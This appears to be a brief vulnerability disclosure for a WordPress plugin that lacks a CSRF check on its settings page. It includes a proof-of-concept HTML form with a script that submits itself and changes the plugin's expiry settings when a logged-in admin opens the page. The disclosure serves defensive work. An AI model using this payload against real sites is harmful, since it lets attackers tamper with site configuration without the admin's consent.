The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=ffe_plugin_options" method="post" id="csrf">
<input type="hidden" name="enable-ffe" value="on">
<input type="hidden" name="num-expiry-days" value="1">
<input type="hidden" name="ffe-png" value="on">
<input type="hidden" name="ffe_save_settings" value="1">
</form><script>csrf.submit()</script>